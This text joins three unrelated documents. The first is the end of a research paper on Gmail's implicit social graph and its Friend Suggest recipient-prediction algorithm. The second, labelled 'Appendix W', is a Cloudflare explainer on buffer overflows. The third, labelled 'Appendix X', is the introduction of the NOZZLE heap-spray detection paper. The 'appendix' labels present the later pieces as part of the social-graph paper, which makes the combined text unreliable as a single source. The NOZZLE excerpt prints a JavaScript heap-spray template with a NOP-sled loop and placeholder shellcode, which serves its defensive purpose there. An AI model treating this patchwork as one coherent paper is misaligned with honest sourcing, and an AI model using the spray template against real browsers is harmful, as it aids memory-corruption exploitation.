         g, a single contact group
  returns: g's contribution to c's score

  1.    return IR(g) × k|g ∩ S|
```

**Table 3: An implementation of UpdateScore that sums the scores of all groups with a non-empty intersection with the seed, weighted by the size of the intersection times some constant $k$.**

We investigate the contribution of group importance to friend suggestion by comparing against a metric, INTERSECTINGGROUPCOUNT in Table 4, that simply counts the number of groups a contact $c$ belongs to that have some intersection with the seed $\mathcal{S}$. This metric ignores Interactions Rank entirely, and treats all implicit groups as having equal value to the user.

Finally, to highlight the importance of using a seed of contacts that characterize a distinct friend group, we compare against an UPDATESCORE instantiation, shown in Table 5, that ignores the seed and always suggests the top-ranked contacts. Contact ranks are computed by summing the Interactions Ranks of the implicit groups containing each contact.

In each metric, the final friend suggestion scores are normalized with respect to the highest-ranked contact, so that a single threshold can be used across all users, to cut off the list of suggested contacts.

```
function IntersectingGroupCount(c, S, g):
  input: c, a single contact
         S, the seed being expanded
         g, a single contact group
  returns: g's contribution to c's score

  1. if g ∩ S ≠ ∅:
  2.    return 1
  3. else:
  4.    return 0
```

**Table 4: An implementation of UpdateScore that counts the number of groups to which a contact belongs, for groups that have a non-empty intersection with the seed.**

```
function TopContactScore(c, S, g):
  input: c, a single contact
         S, the seed being expanded
         g, a single contact group
  returns: an updated rank for the contact c

  1. return IR(g)
```

**Table 5: An implementation of UpdateScore that computes the InteractionsRank of a single contact by summing the scores of all of the groups to which that contact belongs.**

## 4. EVALUATION

In this section, we evaluate the quality of the Friend Suggest algorithm on real user data. We compare the different scoring functions discussed in the previous section, and explore the impact of seed size of friend prediction.

### 4.1 Methodology

Evaluation is one of the major challenges of developing algorithms that make predictions based on online social network data. Often, researchers build their data sets by surveying a small set of users who are willing to provide the ground truth about their online social relationships [8, 9, 21]. By asking users to categorize their contacts into groups, or rate contacts as "close to me" or "not close to me", researchers can build a labeled data set that serves for both training and testing. However, the nature of this type of survey necessarily limits the number and variety of users who can be included in an experiment. Small sample size and user selection bias can harm the accuracy of the evaluation.

We therefore propose a novel, alternate evaluation methodology. From a stream of real email traffic, we randomly sampled 10000 email interactions with between 3 and 25 recipients. Each recipient list is, in essence, a group of contacts that was implicitly clustered by the user. We can test the accuracy of the Friend Suggest algorithm, and compare the relative success of different scoring functions, by sampling a few recipients from each group, and measuring how well Friend Suggest is able to recreate the remaining recipient list. Our approach is similar to the evaluation methodology used by

Pal and McCallum [15], but whereas they removed one recipient from each interaction and verified whether their algorithm could restore him, we begin with small seeds and attempt to generate multiple additional recipients per email.

To generate the 10000 random test interactions, we first sampled 100000 interactions, and then defined rules that aggressively filtered this set to produce a set of email interactions likely to have been generated by active human users. We define an active user as a user with a minimum of 5 implicit groups in his social network, who has sent at least one other email in the 7 days prior to the sampled interaction. We attempt to limit our data set to human users by excluding, via regular expression matching, bots and auto-reply addresses such as "info@domain", and "noreply@domain".

Our experiment tests the ability of our algorithm to use a user's existing social graph to predict his future group interactions. Therefore, when testing our algorithm's ability to predict the remaining recipients in a given email interaction, we use a snapshot of the user's egocentric network based only on interactions that occurred earlier than the sampled interaction.

## 4.2 Results

Each graph below shows precision-recall curves for the Friend Suggest algorithm using the different scoring functions defined in Section 3.3, with seed groups ranging in size from 1 to 5. For the purposes of our evaluation, we measure precision as the percent of correct suggestions out of the total number of contacts suggested for each seed group, and recall as the percent of correct suggestions out of the total number of email recipients who were not already members of the seed group. A correct suggestion is any contact who was a recipient of the email being evaluated.




**Figure 1: Precision/recall curves for the Friend Suggest algorithm with a seed of 2 contacts, run over the four different scoring functions defined in Section 3.3.**

Note that, for all seed sizes, the scoring functions that take into account both group membership and relative group importance, IntersectingGroupScore and IntersectionWeightedScore, significantly out-perform TopContactScore, which ignores the similarity of the seed contacts to the implicit groups and always suggests the top-ranked contacts, and IntersectingGroupCount, which ignores the Interactions Ranks of the groups and simply counts the number of groups in which a contact was a co-recipient with at least one seed contact.




**Figure 2: Precision/recall curves for the Friend Suggest algorithm with a seed of 3 contacts, run over the four different scoring functions defined in Section 3.3.**

Overall, the scoring function with the best performance is IntersectionWeightedScore. For small seed sizes, its performance is similar to IntersectingGroupScore. However, as the size of the seed contact group increases, IntersectionWeightedScore's performance remains fairly constant, while IntersectingGroupScore's ability to correctly predict email recipients decreases. Because it includes in each contact's score the score of *every* implicit group that contains at least one member of the seed group, IntersectionGroupScore is noisy and prone to false positives. By taking into account the size of the intersection between each implicit group and the seed group, IntersectionWeightedScore is able to discount the impact of spurious implicit groups that have low similarity to the seed group.

These experimental results demonstrate that the Friend Suggest algorithm, with a correctly chosen scoring function, is able to predict the remaining recipients of an email with high accuracy, given the first few contacts who were added by the user.

# 5. APPLICATIONS

We use the Friend Suggest algorithm in two Gmail Labs features, "Don't forget Bob!", and "Got the wrong Bob?"

## 5.1 Don't Forget Bob!

"Don't forget Bob" is a straightforward user interface on top of the Friend Suggest algorithm. As seen in Figure 4, "Don't forget Bob" operates when a user is composing an email message. The lab treats the first contacts added by the user as the seed set, and uses them to generate a set of possible suggested recipients that the user may wish to add to the the email. Once the user has added at least two contacts, the application queries the implicit social graph to




**Figure 3: Precision/recall curves for the Friend Suggest algorithm with a seed of 5 contacts, run over the four different scoring functions defined in Section 3.3.**

fetch the user's egocentric network, and uses Friend Suggest to generate up to four contacts who best expand the seed set of existing contacts. These contacts are displayed as clickable links below the "To:" input field. If the user clicks on a suggestion, or types in another email address, it is added to the list of recipients, and a new set of suggestions is generated.

"Don't forget Bob" has been enabled and used by hundreds of thousands of users, and overall, the user response has been positive. One user posted to the lab's feedback group[6], "This is incredibly helpful for work/school/family groups without having to create contact groups." However, accurately measuring the performance of "Don't forget Bob" remains a challenge. We know that users click on a significant fraction of suggestions. Our informal user surveys suggest, though, that many users prefer to continue entering contacts via the keyboard and traditional auto-complete mechanism, and find it inefficient to switch to the mouse in order to click on a suggested contact. Those users report that the displayed suggestions serve as a useful memory trigger, but the added value is difficult to quantify.

## 5.2 Got the Wrong Bob?

A more complex use of the Friend Suggest algorithm can be found in the "Got the wrong Bob?" lab, shown in Figure 5. "Got the wrong Bob" addresses the known problem of email autocompletion errors [4]. While previous approaches have relied heavily on message content, "Got the wrong Bob" uses the Friend Suggest algorithm to detect the inclusion of contacts in a message who are unlikely to be related to the other recipients.

The WrongBob algorithm, shown in Table 6, works as follows: From the current recipients of an email that have been entered by the user, the algorithm attempts to find a single contact whose removal and replacement with another contact from the user $u$'s egocentric network would lead to a more coherent recipient list. For each contact $c_i$ in the current recipient list $L$, WrongBob builds a seed set that includes all of the members of $L$ except $c_i$ (lines 4-5). This seed is expanded via ExpandSeed to generate a set of contacts that are similar to the current members of the seed. If the excluded contact $c_i$ is a member of the suggestion set, it is considered to be related to the other recipients and unlikely to be a mistake (lines 7-8). WrongBob therefore stops searching for a replacement for $c_i$.

If, however, $c_i$ is not returned as a suggestion from ExpandSeed, it is a potential mistake. WrongBob searches for another contact that could replace $c_i$. Each contact $c_j$ in the result set returned by ExpandSeed is compared to the error candidate $c_i$ via a helper function IsSimilar. In our implementation, we measured similarity by checking to see if $c_j$ was listed as an autocomplete suggestion at the time that the user entered the contact $c_i$. If $c_i$ and $c_j$ are similar, and $c_j$'s score as a member of the seed expansion is higher than the current maximum, $c_i$ and $c_j$ are saved as the current candidate pair (lines 10-13). After examining all contacts in $L$, the candidate pair with the highest score is returned and displayed to the used as "Did you mean Contact A instead of Contact B"?

```
function WrongBob(u, L):
  input: u, the user
         L, a list of the recipients of an email
  returns: a pair {c,s} where
         c is a contact ∈ L
         s is a suggested contact to replace c

  1. score_max ← 0
  2. wrongRecipient ← null
  3. suggestedContact ← null
  4. for each contact c_i ∈ L:
  5.   seed ← L \ c_i
  6.   results ← ExpandSeed(u, seed)
  7.   if c_i ∈ results:
  8.     continue
  9.   for each contact c_j ∈ results:
  10.    if IsSimilar(c_i, c_j) and score(c_j) > score_max:
  11.      score_max ← score(c_j)
  12.      wrongRecipient ← c_i
  13.      suggestedContact ← c_j
  14. return {wrongRecipient, suggestedContact}
```

**Table 6: The WrongBob algorithm which, based on the user's egocentric network, checks if one of the existing recipients would be a good candidate for replacement with another contact.**

For example, consider the recipient list $L = \{a, b, c\}$. Assume that when removing $a$ to create the seed list $\{b, c\}$, ExpandSeed generates the suggestion set $\{a, d\}$. In this case, because the excluded contact $a$ is a member of the suggestion set, WrongBob determines that it is not a mistake. Then, when removing $b$, if the algorithm observes $\{b', d\}$, where $b'$ is similar to $b$ but $d$ is not, the algorithm will consider $\{b, b'\}$ as candidates for replacement. If, after removing $c$, the algorithm generates another candidate pair $\{c, c'\}$, then it will return the pair with the highest score.

Like "Don't forget Bob", the "Got the wrong Bob?" lab has

[6]https://groups.google.com/group/gmail-labs-help-suggest-more-recipients




**Figure 4: Example screenshot of the "Don't forget Bob!" lab in action. Given the user's initial seed contacts, "Dopey", "Grumpy", and "Doc", the Friend Suggest algorithm suggests additional recipients "Happy", "Sneezy", and "Sleepy".**




**Figure 5: Example screenshot of "Got the wrong Bob?" In the context of an email to recipients "Tim" and "Angela", the Wrong Bob algorithm detects that the user may have intended to include "Bob Smith" instead of "Bob Jones".**

been enabled and used by hundreds of thousands of users. Additionally, "Got the wrong Bob?" has received a great deal of favorable media attention in both popular forums such as the New York Times and Esquire, and more technical forums like TechCrunch [3, 17, 16]. As in the previous lab, measuring the true performance is challenging. While some users do click on many suggestions, others prefer to edit email recipient lists via the input textbox after being notified by the lab that they may have made a mistake. Overall, user feedback has been positive, with many anecdotal reports of how the lab has helped users to avoid embarrassing mistakes. Together, the Bob labs contribute to an ongoing effort to improve the interactions between Google users and their contacts and groups.

## 6. RELATED WORK

In this section, we discuss related work in three areas: automatic creation of contact groups, analysis of interactions to predict tie strength, and other explorations of communication networks.

### 6.1 Clustering

There has been some previous work on automatic clustering of online contacts into groups. Reto *et al.* present Cluestr, a clustering algorithm that groups contacts using known graph clustering algorithms [12]. They build an unweighted social graph and cluster it based on edge density between contacts. For example, if a user $u$ has a set of contacts $\{c_1 \ldots c_n\}$ who are highly connected to each other, then they are likely to form a group that is meaningful to $u$. However, this sociocentric algorithm can only apply to networks in which $u$ is aware of the connections between his contacts. Recall that in our work, we use only the egocentric network of each user, to avoid exposing to the user the private information of his contacts.

In their work on email networks, Pal and McCallum use message content to cluster email recipients into groups [15]. For each user, they build a model that maps keywords and phrases extracted from email messages to the contents who are likely to receive an email containing those terms. They show how these models can be used to successfully predict the recipients of an unaddressed message, and even more successfully, how the "CC:" and "BCC:" recipients can be predicted, given the "TO:" recipients. Carvalho and Cohen use a similar content-based model to solve the inverse problem of finding group anti-members, or email recipients who were likely added to a message by mistake [4]. Unlike these approaches, our analysis is based only on interactions, and disregards content.

The C-Rank algorithm of Bar-Yossef *et al.* is the most similar to the Friend Suggest algorithm described in this paper, in that it is applied to email egocentric networks formed by creating edges between contacts if they appear as co-recipients in email messages [2]. Edges are assigned weights

according to the number of email messages involving each pair of contacts. The graph is then thresholded at a number of different edge weight thresholds, with edges falling below the threshold removed, to created a set of unweighted graphs. C-Rank identifies clusters of contacts within these graphs by finding *vertex separators*, or contacts whose removal from the graph creates disconnected subgraphs. The authors claim that a good cluster is one that exists in several graphs with different threshold levels.

Within enterprise networks, where expectations of privacy are lower than in consumer email networks, researchers have used sociocentric analysis to cluster and classify groups of users. For example, De Choudhury *et al.* use an inferred social network constructed from email interactions to assign roles to the various participants, such as "student", "faculty", or "director" [6]. They use email frequency to filter noisy and potentially spurious edges from the graph.

### 6.2 Tie-Strength Prediction

Another body of related work has explored the use of interactions as a signal for measuring the strength of social ties. Much of this work has studied the relationship between Facebook users and their contacts. Gilbert and Karahalios use a set of 70 different features to predict the strength of connection between a user and his Facebook friends [8]. These features range from demographic features of the users, such as age and religion, to interaction frequency and recency features such as the number of comments a user has left on his friend's photos and the time elapsed since their last email exchange. They found that the strongest predictor of tie strength between two individuals is a short elapsed time between message exchanges.

In other work on Facebook tie strength prediction, Kahanda and Neville compare the relative predictive value of interactions, which they call *transactional features*, as compared to graph topology or profile attribute features [9]. They found the highest predictive value in *network-transactional features*, which extend transactional features to include friend-of-friend links. For example, "Person X posted on Person Y's wall" is a network-transactional feature about the relationship between Person X and some other Person Z, if Y and Z are friends. Xiang *et al.* also build a predictive model of the strength of ties on Facebook, looking at interactions such as face-tagging in photos [20].

In email networks, researchers have primarily been interested in tie-strength as a useful feature for predicting the emails to which a user is likely to reply [10]. Yoo *et al.* find that including social features along with message content-based features in the vector of classifier input led to a significant reduction in prediction error when learning to identify the emails that a given user will consider important [21].

### 6.3 Communication Networks

Finally, there has been significant recent interest in exploring and understanding the properties of communication networks. Ting *et al.* propose a general-purpose architecture for extracting communication-based social networks from multiple sources of interaction data [18]. Leskovec *et al.* survey a large number of different communication networks to answer the question of whether they share a common community structure [14]. An in-depth study of one particular explicit network, the social network formed by MSN Instant Messenger users, is performed by Leskovec and Horvitz [13]. They find that users tend to communicate most frequently with users who are demographically similar to themselves. Furthermore, they find that the overall network is robust to the removal of random nodes, in that it does not disturb the overall connectivity of the graph.

Email networks are the most commonly studied implicit social graphs. Dodds *et al.* show that email networks follow a small-world property, with an average shortest path of 4.1 steps between any two nodes [7]. Adamic and Adar further explore strategies that users can employ to exploit this dense connectivity in order to efficiently propagate information through an enterprise email network [1]. Kossinets and Watts study the social network formed by email exchanges between students and faculty of a large university, and find that, although the local connections between individuals evolve over time, the overall network structure remains stable [11].

## 7. CONCLUSIONS

In this paper, we studied the *implicit social graph*, a social network that is constructed by the interactions between users and their groups. We proposed an interaction-based metric for computing the relative importance of the contacts and groups in a user's egocentric network, that takes into account the recency, frequency, and direction of interactions. We then defined the Friend Suggest algorithm which, given a single user's egocentric network with computed edge weights and a seed set of a few labeled contacts, finds other contacts who are related to the seed contacts, and therefore form a semantically meaningful group. We demonstrated the effectiveness of the Friend Suggest algorithm via a novel experimental methodology. Finally, we showed two applications of the Friend Suggest algorithm, the Gmail Labs "Don't forget Bob!" and "Got the wrong Bob?"

Although the experimental results described in this paper were performed by examining email interactions from the Google Mail system, the algorithms and approaches described in this paper apply to any interaction-based social network. Some other interaction types that could form similar implicit networks are photo and document sharing, instant messenger chatting, online calendar meeting invitations, or comments on blog posts. Even offline interactions, such as mobile text messages or telephone calls, form an implicit social graph between individuals and groups. Our future research is intended to study the relative importance of different interaction types in determining the social relationships between individuals. We are also interested in exploring other applications of the Friend Suggest algorithm, such as identifying trusted recommenders for online recommendation systems, or improving content sharing between users in various online contents.

## 8. REFERENCES

[1] L. Adamic and E. Adar. How to search a social network. *Social Networks*, 27, 2005.

[2] Z. Bar-Yossef, I. Guy, R. Lempel, Y. S. Maarek, and V. Soroka. Cluster ranking with an application to mining mailbox networks. In *Proceeding of the IEEE International Conference on Data Mining (ICDM)*, December 2006.

[3] J. D. Biersdorfer. Tip of the week: Got the wrong Bob? http://www.nytimes.com/2009/10/22/technology /personaltech/22askk-003.html, October 22 2009.

[4] V. R. Carvalho and W. W. Cohen. Preventing information leaks in email. In *Proceedings of the Seventh SIAM International Conference on Data Mining (SDM)*, April 2007.

[5] V. R. Carvalho and W. W. Cohen. Ranking users for intelligent message addressing. In *Proceedings of the 30th European Conference on IR Research (ECIR)*, March 2008.

[6] M. D. Choudhury, W. Mason, J. Hofman, and D. Watts. Inferring relevant social networks from interpersonal communication. In *Proceedings of the 19th International World Wide Web Conference (WWW)*, April 2010.

[7] P. S. Dodds, R. Muhamad, and D. J. Watts. An experimental study of search in global social networks. *Science*, 301, 2003.

[8] E. Gilbert and K. Karahalios. Predicting tie strength with social media. In *Proceedings of Computer Human Interaction (CHI)*, April 2009.

[9] I. Kahanda and J. Neville. Using transactional information to predict link strength in online social networks. In *Proceedings of the Third International Conference on Weblogs and Social Media (ICWSM)*, June 2009.

[10] T. Karagiannis and M. Vojnovic. Behavioral profiles for advanced email features. In *Proceedings of 18th International World Wide Web Conference (WWW)*, April 2009.

[11] G. Kossinets and D. J. Watts. Empirical analysis of an evolving social network. *Science*, 311, 2006.

[12] M. Kuhn and M. Wirz. Cluestr: Mobile social networking for enhanced group communication. In *Proceedings of the International Conference on Supporting Group Work (GROUP)*, May 2009.

[13] J. Leskovec and E. Horvitz. Planetary-scale views on a large instant-messaging network. In *Proceedings of the 17th International World Wide Web Conference (WWW)*, April 2008.

[14] J. Leskovec, K. J. Lang, A. Dasgupta, and M. W. Mahoney. Statistical properties of community structure in large social and information networks. In *Proceedings of the 17th International World Wide Web Conference (WWW)*, 2008.

[15] C. Pal and A. McCallum. CC prediction with graphical models. In *Proceedings of the Third Conference on Email and Anti-Spam (CEAS)*, July 2006.

[16] M. Siegler. Meeting with the Bobs? Gmail will now make sure you contact the right one. http://www.techcrunch.com/2009/10/13/ meeting-with-the-bobs-gmail-will-now-make-sure-you-contact-the-right-one/, October 13 2009.

[17] M. Sullivan. Self-correcting e-mail: Because you can drunk-dial at the office, too. http://www.esquire.com/blogs/endorsement/ gmail-got-the-wrong-bob-101309, October 13, 2009.

[18] I.-H. Ting, H.-J. Wu, and P.-S. Chang. Analyzing multi-source social data for extracting and mining social networks. In *Proceedings of the International Conference on Computational Science and Engineering*, 2009.

[19] R. E. Tulloss. Assessment of similarity indices for undesirable properties and a new tripartite similarity index based on cost functions. In M. E. Palm and I. H. Chapela, editors, *Mycology in Sustainable Developement: Expanding Concepts, Vanishing Borders*, pages 122–143. Parkway Publishers, 1997.

[20] R. Xiang, J. Neville, and M. Rogati. Modeling relationship strength in online social networks. In *Workshop on Analyzing Networks and Learning with Graphs*, December 2009.

[21] S. Yoo, Y. Yang, F. Lin, and I.-C. Moon. Mining social networks for personalized email prioritization. In *Proceedings of the International Conference on Knowledge Discovery and Data Mining (SIGKDD)*, June 2009.

# APPENDIX W

Sign up Sales: +1 (888) 99 FLARE

CLOUDFLARE

Platform Products Developers Partners Resources Company

Log in Contact sales

# What is buffer overflow?

A buffer overflow occurs when a program writing data to a buffer overloads that buffer's capacity. It's like pouring 12 ounces of milk into an 8 ounce glass.

Learning Center What is web application security? API security Common threats More attacks Ransomware Glossary theNET

## Learning Objectives

**After reading this article you will be able to:**

- Define a buffer
- Explain buffer overflow and how it can be used in a cyber attack
- Understand who is most vulnerable and how to protect against buffer overflow attacks

**RELATED CONTENT**

- What is web application security?
- Data scraping
- Cross-site request forgery
- Brute force attack
- Why use HTTPS?

Want to keep learning?

Subscribe to theNET, Cloudflare's monthly recap of the Internet's most popular insights!

Email: *

Subscribe to theNET

Refer to Cloudflare's Privacy Policy to learn how we collect and process your personal data.

Copy article link

## What is buffer overflow?

Buffer overflow is an anomaly that occurs when software writing data to a buffer overflows the buffer's capacity, resulting in adjacent memory locations being overwritten. In other words, too much information is being passed into a container that does not have enough space, and that information ends up replacing data in adjacent containers.

Buffer overflows can be exploited by attackers with a goal of modifying a computer's memory in order to undermine or take control of program execution.




## What's a buffer?

A buffer, or data buffer, is an area of physical memory storage used to temporarily store data while it is being moved from one place to another. These buffers typically live in RAM memory. Computers frequently use buffers to help improve performance; most modern hard drives take advantage of buffering to efficiently access data, and many online services also use buffers. For example, buffers are frequently used in online video streaming to prevent interruption. When a video is streamed, the video player downloads and stores perhaps 20% of the video at a time in a buffer and then streams from that buffer. This way, minor drops in connection speed or quick service disruptions won't affect the video stream performance.

Buffers are designed to contain specific amounts of data. Unless the program utilizing the buffer has built-in instructions to discard data when too much is sent to the buffer, the program will overwrite data in memory adjacent to the buffer.

Buffer overflows can be exploited by attackers to corrupt software. Despite being well-understood, buffer overflow attacks are still a major security problem that torment cyber-security teams. In 2014 a threat known as 'heartbleed' exposed hundreds of millions of users to attack because of a buffer overflow vulnerability in SSL software.

## How do attackers exploit buffer overflows?

An attacker can deliberately feed a carefully crafted input into a program that will cause the program to try and store that input in a buffer that isn't large enough, overwriting portions of memory connected to the buffer space. If the memory layout of the program is well-defined, the attacker can deliberately overwrite areas known to contain executable code. The attacker can then replace this code with his own executable code, which can drastically change how the program is intended to work.

For example if the overwritten part in memory contains a pointer (an object that points to another place in memory) the attacker's code could replace that code with another pointer that points to an exploit payload. This can transfer control of the whole program over to the attacker's code.

## Who is vulnerable to buffer overflow attacks?

Certain coding languages are more susceptible to buffer overflow than others. C and C++ are two popular languages with high vulnerability, since they contain no built-in protections against accessing or overwriting data in their memory. Windows, Mac OSX, and Linux all contain code written in one or both of these languages.

More modern languages like Java, PERL, and C# have built-in features that help reduce the chances of buffer overflow, but cannot prevent it altogether.

## How to protect against buffer overflow attacks

Luckily, modern operating systems have runtime protections which help mitigate buffer overflow attacks. Let's explore 2 common protections that help mitigate the risk of exploitation:

- **Address space randomization** - Randomly rearranges the address space locations of key data areas of a process. Buffer overflow attacks generally rely on knowing the exact location of important executable code, randomization of address spaces makes that nearly impossible.
- **Data execution prevention** - Marks certain areas of memory either executable or non-executable, preventing an exploit from running code found in a non-executable area.

Software developers can also take precautions against buffer overflow vulnerabilities by writing in languages that have built-in protections or using special security procedures in their code.

Despite precautions, new buffer overflow vulnerabilities continue to be discovered by developers, sometimes in the wake of a successful exploitation. When new vulnerabilities are discovered, engineers need to patch the affected software and ensure that users of the software get access to the patch.

## What are the different types of buffer overflow attacks?

There are a number of different buffer overflow attacks which employ different strategies and target different pieces of code. Below are a few of the most well-known.

- **Stack overflow attack** - This is the most common type of buffer overflow attack and involves overflowing a buffer on the call stack*.
- **Heap overflow attack** - This type of attack targets data in the open memory pool known as the heap*.
- **Integer overflow attack** - In an integer overflow, an arithmetic operation results in an integer (whole number) that is too large for the integer type meant to store it; this can result in a buffer overflow.
- **Unicode overflow** - A unicode overflow creates a buffer overflow by inserting unicode characters into an input that expect ASCII characters. (ASCII and unicode are encoding standards that let computers represent text. For example the letter 'a' is represented by the number 97 in ASCII. While ASCII codes only cover characters from Western languages, unicode can create characters for almost every written language on earth. Because there are so many more characters available in unicode, many unicode characters are larger than the largest ASCII character.)

*Computers rely on two different memory allocation models, known as the stack and the heap; both live in the computer's RAM. The stack is neatly organized and holds data in a Last-In, First-Out model. Whatever piece of data was most recently placed in the stack will be the first to come out, kind of like how the last bullet inserted into an ammunition magazine will be the first to be fired. The heap is a disorganized pool of extra memory, data does not enter or leave the heap in any particular order. Since accessing memory from the stack is much faster than accessing from the heap, the heap is generally reserved for larger pieces of data or data that a programmer wants to manage explicitly.

GETTING STARTED

Free plans

Small business plans

For enterprises

Get a recommendation

Request a demo

Contact sales

About web application security

Common threats

VPN resources

Security glossary

Learning Center navigation

© 2026 Cloudflare, Inc. | Privacy Policy | Terms of Use | Report Security Issues | Your Privacy Choices | Trademark

# APPENDIX X

# NOZZLE: A Defense Against Heap-spraying Code Injection Attacks

Paruj Ratanaworabhan
Cornell University
paruj@csl.cornell.edu

Benjamin Livshits
Microsoft Research
livshits@microsoft.com

Benjamin Zorn
Microsoft Research
zorn@microsoft.com

## Abstract

Heap spraying is a security attack that increases the exploitability of memory corruption errors in type-unsafe applications. In a heap-spraying attack, an attacker coerces an application to allocate many objects containing malicious code in the heap, increasing the success rate of an exploit that jumps to a location within the heap. Because heap layout randomization necessitates new forms of attack, spraying has been used in many recent security exploits. Spraying is especially effective in web browsers, where the attacker can easily allocate the malicious objects using JavaScript embedded in a web page. In this paper, we describe NOZZLE, a runtime heap-spraying detector. NOZZLE examines individual objects in the heap, interpreting them as code and performing a static analysis on that code to detect malicious intent. To reduce false positives, we aggregate measurements across all heap objects and define a global heap health metric.

We measure the effectiveness of NOZZLE by demonstrating that it successfully detects 12 published and 2,000 synthetically generated heap-spraying exploits. We also show that even with a detection threshold set six times lower than is required to detect published malicious attacks, NOZZLE reports no false positives when run over 150 popular Internet sites. Using sampling and concurrent scanning to reduce overhead, we show that the performance overhead of NOZZLE is less than 7% on average. While NOZZLE currently targets heap-based spraying attacks, its techniques can be applied to any attack that attempts to fill the address space with malicious code objects (e.g., stack spraying [42]).

## 1 Introduction

In recent years, security improvements have made it increasingly difficult for attackers to compromise systems. Successful prevention measures in runtime environments and operating systems include stack protection [10], improved heap allocation layouts [7, 20], address space layout randomization [8, 36], and data execution prevention [21]. As a result, attacks that focus on exploiting memory corruptions in the heap are now popular [28].

Heap spraying, first described in 2004 by SkyLined [38], is an attack that allocates many objects containing the attacker's exploit code in an application's heap. Heap spraying is a vehicle for many high profile attacks, including a much publicized exploit in Internet Explorer in December 2008 [23] and a 2009 exploit of Adobe Reader using JavaScript embedded in malicious PDF documents [26].

Heap spraying requires that an attacker use another security exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success because the exact addresses of objects in the heap do not need to be known. To perform heap spraying, attackers have to be able to allocate objects whose contents they control in an application's heap. The most common method used by attackers to achieve this goal is to target an application, such as a web browser, which executes an interpreter as part of its operation. By providing a web page with embedded JavaScript, an attacker can induce the interpreter to allocate their objects, allowing the spraying to occur. While this form of spraying attack is the most common, and the one we specifically consider in this paper, the techniques we describe apply to all forms of heap spraying. A number of variants of spraying attacks have recently been proposed including sprays involving compiled bytecode, ANI cursors [22], and thread stacks [42].

In this paper, we describe NOZZLE, a detector of heap spraying attacks that monitors heap activity and reports spraying attempts as they occur. To detect heap spraying attacks, NOZZLE has two complementary components. First, NOZZLE scans individual objects looking for signs of malicious intent. Malicious code commonly includes a landing pad of instructions (a so-called NOP sled) whose execution will lead to dangerous shellcode. NOZZLE focuses on detecting a sled through an analysis of its control flow. We show that prior work on sled detection [4, 16, 31, 43] has a high false positive rate when applied to objects in heap-spraying attacks (partly due to

the opcode density of the x86 instruction set). NOZZLE interprets individual objects as code and performs a static analysis, going beyond prior sled detection work by reasoning about code reachability. We define an attack surface metric that approximately answers the question: “If I were to jump randomly into this object (or heap), what is the likelihood that I would end up executing shellcode?”

In addition to local object detection, NOZZLE aggregates information about malicious objects across the entire heap, taking advantage of the fact that heap spraying requires large-scale changes to the contents of the heap. We develop a general notion of global “heap health” based on the measured attack surface of the applicatoin heap contents, and use this metric to reduce NOZZLE’s false positive rates.

Because NOZZLE only examines object contents and requires no changes to the object or heap structure, it can easily be integrated into both native and garbage-collected heaps. In this paper, we implement NOZZLE by intercepting calls to the memory manager in the Mozilla Firefox browser (version 2.0.0.16). Because browsers are the most popular target of heap spray attacks, it is crucial for a successful spray detector to both provide high successful detection rates and low false positive rates. While the focus of this paper is on low-overhead online detection of heap spraying, NOZZLE can be easily used for offline scanning to find malicious sites in the wild [45]. For offline scanning, we can combine our spraying detector with other checkers such as those that match signatures against the exploit code, etc.

### 1.1 Contributions

This paper makes the following contributions:

- We propose the first effective technique for detecting heap-spraying attacks through runtime interpretation and static analysis. We introduce the concept of attack surface area for both individual objects and the entire heap. Because directing program control to shellcode is a fundamental property of NOP sleds, the attacker cannot hide that intent from our analysis.
- We show that existing published sled detection techniques [4, 16, 31, 43] have high false positive rates when applied to heap objects. We describe new techniques that dramatically lower the false positive rate in this context.
- We measure Firefox interacting with popular web sites and published heap-spraying attacks, we show that NOZZLE successfully detects 100% of 12 published and 2,000 synthetically generated heap-spraying exploits. We also show that even with a detection threshold set six times lower than is required to detect known malicious attacks, NOZZLE reports no false positives when tested on 150 popular Alexa.com sites.
- We measure the overhead of NOZZLE, showing that without sampling, examining every heap object slows execution 2–14 times. Using sampling and concurrent scanning, we show that the performance overhead of NOZZLE is less than 7% on average.
- We provide the results of applying NOZZLE to Adobe Reader to prevent a recent heap spraying exploit embedded in PDF documents. NOZZLE succeeds at stopping this attack without any modifications, with a runtime overhead of 8%.

### 1.2 Paper Organization

The rest of the paper is organized as follows. Section 2 provides background on heap spraying attacks. Section 3 provides an overview of NOZZLE and Section 4 goes into the technical details of our implementation. Section 5 summarizes our experimental results. While NOZZLE is the first published heap spraying detection technique, our approach has several limitations, which we describe fully in Section 6. Finally, Section 7 describes related work and Section 8 concludes.

## 2 Background

Heap spraying has much in common with existing stack and heap-based code injection attacks. In particular, the attacker attempts to inject code somewhere in the address space of the target program, and through a memory corruption exploit, coerce the program to jump to that code. Because the success of stack-based exploits has been reduced by the introduction of numerous security measures, heap-based attacks are now common. Injecting and exploiting code in the heap is more difficult for an attacker than placing code on the stack because the addresses of heap objects are less predictable than those of stack objects. Techniques such as address space layout randomization [8, 36] further reduce the predictability of objects on the heap. Attackers have adopted several strategies for overcoming this uncertainty [41], with heap spraying the most successful approach.

Figure 1 illustrates a common method of implementing a heap-spraying attack. Heap spraying requires a memory corruption exploit, as in our example, where an attacker has corrupted a vtable method pointer to point to an incorrect address of their choosing. At the same time, we assume that the attacker has been able, through entirely legal methods, to allocate objects with contents of their choosing on the heap. Heap spraying relies on populating the heap with a large number of objects containing the attacker’s code, assigning the vtable exploit to jump to an




Figure 1: Schematic of a heap spraying attack.

```
1. <SCRIPT language="text/javascript">
2.   shellcode = unescape("%u4343%u4343%...");
3.   oneblock = unescape("%u0D0D%u0D0D");
4.
5.   var fullblock = oneblock;
6.   while (fullblock.length<0x40000) {
7.       fullblock += fullblock;
8.   }
9.
10. sprayContainer = new Array();
11. for (i=0; i<1000; i++) {
12.     sprayContainer[i] = fullblock + shellcode;
13. }
14. </SCRIPT>
```

Figure 2: A typical JavaScript heap spray.

arbitrary address in the heap, and relying on luck that the jump will land inside one of their objects. To increase the likelihood that the attack will succeed, attackers usually structure their objects to contain an initial NOP sled (indicated in white) followed by the code that implements the exploit (commonly referred to as shellcode, indicated with shading). Any jump that lands in the NOP sled will eventually transfer control to the shellcode. Increasing the size of the NOP sled and the number of sprayed objects increases the probability that the attack will be successful.

Heap spraying requires that the attacker control the contents of the heap in the process they are attacking. There are numerous ways to accomplish this goal, including providing data (such as a document or image) that when read into memory creates objects with the desired properties. An easier approach is to take advantage of scripting languages to allocate these objects directly. Browsers are particularly vulnerable to heap spraying because JavaScript embedded in a web page authored by the attacker greatly simplifies such attacks.

